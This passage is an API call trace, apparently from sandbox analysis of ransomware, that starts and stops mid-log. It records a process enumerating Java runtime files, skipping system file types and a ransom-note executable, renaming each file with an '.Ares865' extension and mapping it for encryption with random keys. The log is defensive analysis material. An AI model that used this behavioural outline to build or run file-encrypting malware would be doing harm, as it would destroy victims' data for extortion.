[0131.434] lstrcmpiW (lpString1="accessibility.properties", lpString2=".lnk") returned 1 [0131.434] lstrlenW (lpString=".ini") returned 4 [0131.434] lstrcmpiW (lpString1="accessibility.properties", lpString2=".ini") returned 1 [0131.434] lstrlenW (lpString=".sys") returned 4 [0131.434] lstrcmpiW (lpString1="accessibility.properties", lpString2=".sys") returned 1 [0131.434] lstrlenW (lpString="accessibility.properties") returned 24 [0131.435] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties.Ares865") returned 69 [0131.435] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\accessibility.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\accessibility.properties.ares865"), dwFlags=0x1) returned 1 [0131.436] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\accessibility.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.436] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=155) returned 1 [0131.437] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.437] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.437] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.438] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3a0, lpName=0x0) returned 0x170 [0131.442] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3a0) returned 0x190000 [0131.443] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.443] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.443] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.444] lstrcpyW (in: lpString1=0x2cce44a, lpString2="alt-rt.jar" | out: lpString1="alt-rt.jar") returned="alt-rt.jar" [0131.444] lstrlenW (lpString="alt-rt.jar") returned 10 [0131.444] lstrlenW (lpString="Ares865") returned 7 [0131.444] lstrcmpiW (lpString1="-rt.jar", lpString2="Ares865") returned 1 [0131.444] lstrlenW (lpString=".dll") returned 4 [0131.444] lstrcmpiW (lpString1="alt-rt.jar", lpString2=".dll") returned 1 [0131.444] lstrlenW (lpString=".lnk") returned 4 [0131.444] lstrcmpiW (lpString1="alt-rt.jar", lpString2=".lnk") returned 1 [0131.444] lstrlenW (lpString=".ini") returned 4 [0131.444] lstrcmpiW (lpString1="alt-rt.jar", lpString2=".ini") returned 1 [0131.444] lstrlenW (lpString=".sys") returned 4 [0131.444] lstrcmpiW (lpString1="alt-rt.jar", lpString2=".sys") returned 1 [0131.444] lstrlenW (lpString="alt-rt.jar") returned 10 [0131.445] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.Ares865") returned 55 [0131.445] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\alt-rt.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\alt-rt.jar.ares865"), dwFlags=0x1) returned 1 [0131.446] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\alt-rt.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.447] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=172765) returned 1 [0131.447] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.448] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.448] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.448] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2a5e0, lpName=0x0) returned 0x170 [0131.450] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2a5e0) returned 0x420000 [0131.458] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.459] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.459] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.462] lstrcpyW (in: lpString1=0x2cce44a, lpString2="applet" | out: lpString1="applet") returned="applet" [0131.462] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0131.462] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x58) returned 0x2df770 [0131.462] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0131.462] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7444ab00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7444ab00, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="calendars.properties", cAlternateFileName="CALEND~1.PRO")) returned 1 [0131.462] lstrcmpiW (lpString1="calendars.properties", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0131.462] lstrcmpiW (lpString1="calendars.properties", lpString2="aoldtz.exe") returned 1 [0131.462] lstrcpyW (in: lpString1=0x2cce44a, lpString2="calendars.properties" | out: lpString1="calendars.properties") returned="calendars.properties" [0131.462] lstrlenW (lpString="calendars.properties") returned 20 [0131.462] lstrlenW (lpString="Ares865") returned 7 [0131.462] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0131.462] lstrlenW (lpString=".dll") returned 4 [0131.462] lstrcmpiW (lpString1="calendars.properties", lpString2=".dll") returned 1 [0131.462] lstrlenW (lpString=".lnk") returned 4 [0131.462] lstrcmpiW (lpString1="calendars.properties", lpString2=".lnk") returned 1 [0131.462] lstrlenW (lpString=".ini") returned 4 [0131.462] lstrcmpiW (lpString1="calendars.properties", lpString2=".ini") returned 1 [0131.462] lstrlenW (lpString=".sys") returned 4 [0131.462] lstrcmpiW (lpString1="calendars.properties", lpString2=".sys") returned 1 [0131.462] lstrlenW (lpString="calendars.properties") returned 20 [0131.463] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties.Ares865") returned 65 [0131.463] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\calendars.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\calendars.properties.ares865"), dwFlags=0x1) returned 1 [0131.465] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\calendars.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.465] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1232) returned 1 [0131.465] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.466] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.466] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.466] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x170 [0131.468] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x190000 [0131.469] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.469] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.469] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.470] lstrcpyW (in: lpString1=0x2cce44a, lpString2="charsets.jar" | out: lpString1="charsets.jar") returned="charsets.jar" [0131.470] lstrlenW (lpString="charsets.jar") returned 12 [0131.470] lstrlenW (lpString="Ares865") returned 7 [0131.470] lstrcmpiW (lpString1="ets.jar", lpString2="Ares865") returned 1 [0131.470] lstrlenW (lpString=".dll") returned 4 [0131.470] lstrcmpiW (lpString1="charsets.jar", lpString2=".dll") returned 1 [0131.470] lstrlenW (lpString=".lnk") returned 4 [0131.470] lstrcmpiW (lpString1="charsets.jar", lpString2=".lnk") returned 1 [0131.470] lstrlenW (lpString=".ini") returned 4 [0131.470] lstrcmpiW (lpString1="charsets.jar", lpString2=".ini") returned 1 [0131.470] lstrlenW (lpString=".sys") returned 4 [0131.470] lstrcmpiW (lpString1="charsets.jar", lpString2=".sys") returned 1 [0131.470] lstrlenW (lpString="charsets.jar") returned 12 [0131.471] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.Ares865") returned 57 [0131.471] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\charsets.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\charsets.jar.ares865"), dwFlags=0x1) returned 1 [0131.473] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\charsets.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.473] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3556391) returned 1 [0131.473] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.474] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.474] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.475] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x364730, lpName=0x0) returned 0x170 [0131.476] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x164730) returned 0x3030000 [0131.743] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.744] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.744] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.770] lstrcpyW (in: lpString1=0x2cce44a, lpString2="classlist" | out: lpString1="classlist") returned="classlist" [0131.770] lstrlenW (lpString="classlist") returned 9 [0131.770] lstrlenW (lpString="Ares865") returned 7 [0131.770] lstrcmpiW (lpString1="asslist", lpString2="Ares865") returned 1 [0131.770] lstrlenW (lpString=".dll") returned 4 [0131.770] lstrcmpiW (lpString1="classlist", lpString2=".dll") returned 1 [0131.770] lstrlenW (lpString=".lnk") returned 4 [0131.770] lstrcmpiW (lpString1="classlist", lpString2=".lnk") returned 1 [0131.770] lstrlenW (lpString=".ini") returned 4 [0131.770] lstrcmpiW (lpString1="classlist", lpString2=".ini") returned 1 [0131.770] lstrlenW (lpString=".sys") returned 4 [0131.771] lstrcmpiW (lpString1="classlist", lpString2=".sys") returned 1 [0131.771] lstrlenW (lpString="classlist") returned 9 [0131.771] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\classlist.Ares865") returned 54 [0131.771] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\classlist" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\classlist"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\classlist.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\classlist.ares865"), dwFlags=0x1) returned 1 [0131.774] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\classlist.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\classlist.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.774] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=75075) returned 1 [0131.774] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.775] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.775] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.775] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12850, lpName=0x0) returned 0x170 [0131.776] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12850) returned 0x190000 [0131.780] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.781] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.781] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.783] lstrcpyW (in: lpString1=0x2cce44a, lpString2="cmm" | out: lpString1="cmm") returned="cmm" [0131.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0131.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2df7d0 [0131.783] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0131.783] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74470c60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74470c60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74470c60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x15ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="content-types.properties", cAlternateFileName="CONTEN~1.PRO")) returned 1 [0131.783] lstrcmpiW (lpString1="content-types.properties", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0131.783] lstrcmpiW (lpString1="content-types.properties", lpString2="aoldtz.exe") returned 1 [0131.783] lstrcpyW (in: lpString1=0x2cce44a, lpString2="content-types.properties" | out: lpString1="content-types.properties") returned="content-types.properties" [0131.783] lstrlenW (lpString="content-types.properties") returned 24 [0131.783] lstrlenW (lpString="Ares865") returned 7 [0131.783] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0131.783] lstrlenW (lpString=".dll") returned 4 [0131.783] lstrcmpiW (lpString1="content-types.properties", lpString2=".dll") returned 1 [0131.783] lstrlenW (lpString=".lnk") returned 4 [0131.783] lstrcmpiW (lpString1="content-types.properties", lpString2=".lnk") returned 1 [0131.783] lstrlenW (lpString=".ini") returned 4 [0131.783] lstrcmpiW (lpString1="content-types.properties", lpString2=".ini") returned 1 [0131.783] lstrlenW (lpString=".sys") returned 4 [0131.783] lstrcmpiW (lpString1="content-types.properties", lpString2=".sys") returned 1 [0131.783] lstrlenW (lpString="content-types.properties") returned 24 [0131.784] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\content-types.properties.Ares865") returned 69 [0131.784] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\content-types.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\content-types.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\content-types.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\content-types.properties.ares865"), dwFlags=0x1) returned 1 [0131.786] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\content-types.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\content-types.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.786] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5548) returned 1 [0131.786] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.787] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.787] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.787] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18b0, lpName=0x0) returned 0x170 [0131.788] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18b0) returned 0x190000 [0131.790] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.790] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.790] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.791] lstrcpyW (in: lpString1=0x2cce44a, lpString2="currency.data" | out: lpString1="currency.data") returned="currency.data" [0131.791] lstrlenW (lpString="currency.data") returned 13 [0131.791] lstrlenW (lpString="Ares865") returned 7 [0131.791] lstrcmpiW (lpString1="cy.data", lpString2="Ares865") returned 1 [0131.791] lstrlenW (lpString=".dll") returned 4 [0131.791] lstrcmpiW (lpString1="currency.data", lpString2=".dll") returned 1 [0131.791] lstrlenW (lpString=".lnk") returned 4 [0131.791] lstrcmpiW (lpString1="currency.data", lpString2=".lnk") returned 1 [0131.791] lstrlenW (lpString=".ini") returned 4 [0131.791] lstrcmpiW (lpString1="currency.data", lpString2=".ini") returned 1 [0131.791] lstrlenW (lpString=".sys") returned 4 [0131.791] lstrcmpiW (lpString1="currency.data", lpString2=".sys") returned 1 [0131.791] lstrlenW (lpString="currency.data") returned 13 [0131.792] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\currency.data.Ares865") returned 58 [0131.792] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\currency.data" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\currency.data"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\currency.data.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\currency.data.ares865"), dwFlags=0x1) returned 1 [0131.793] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\currency.data.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\currency.data.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.794] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4200) returned 1 [0131.794] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.795] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.795] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.795] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1370, lpName=0x0) returned 0x170 [0131.796] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1370) returned 0x190000 [0131.797] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.798] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.798] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.799] lstrcpyW (in: lpString1=0x2cce44a, lpString2="deploy" | out: lpString1="deploy") returned="deploy" [0131.799] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0131.799] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x58) returned 0x2df830 [0131.799] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0131.799] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75246c40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x75246c40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x75305320, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x449777, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="deploy.jar", cAlternateFileName="")) returned 1 [0131.799] lstrcmpiW (lpString1="deploy.jar", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0131.799] lstrcmpiW (lpString1="deploy.jar", lpString2="aoldtz.exe") returned 1 [0131.799] lstrcpyW (in: lpString1=0x2cce44a, lpString2="deploy.jar" | out: lpString1="deploy.jar") returned="deploy.jar" [0131.799] lstrlenW (lpString="deploy.jar") returned 10 [0131.799] lstrlenW (lpString="Ares865") returned 7 [0131.799] lstrcmpiW (lpString1="loy.jar", lpString2="Ares865") returned 1 [0131.799] lstrlenW (lpString=".dll") returned 4 [0131.799] lstrcmpiW (lpString1="deploy.jar", lpString2=".dll") returned 1 [0131.799] lstrlenW (lpString=".lnk") returned 4 [0131.799] lstrcmpiW (lpString1="deploy.jar", lpString2=".lnk") returned 1 [0131.799] lstrlenW (lpString=".ini") returned 4 [0131.799] lstrcmpiW (lpString1="deploy.jar", lpString2=".ini") returned 1 [0131.799] lstrlenW (lpString=".sys") returned 4 [0131.799] lstrcmpiW (lpString1="deploy.jar", lpString2=".sys") returned 1 [0131.799] lstrlenW (lpString="deploy.jar") returned 10 [0131.800] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar.Ares865") returned 55 [0131.800] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy.jar.ares865"), dwFlags=0x1) returned 1 [0131.802] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.802] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4495223) returned 1 [0131.802] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.803] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.803] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.803] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x449a80, lpName=0x0) returned 0x170 [0131.805] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x49a80) returned 0x420000 [0131.941] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.942] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.942] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.954] lstrcpyW (in: lpString1=0x2cce44a, lpString2="ext" | out: lpString1="ext") returned="ext" [0131.955] RtlAllocateHeap 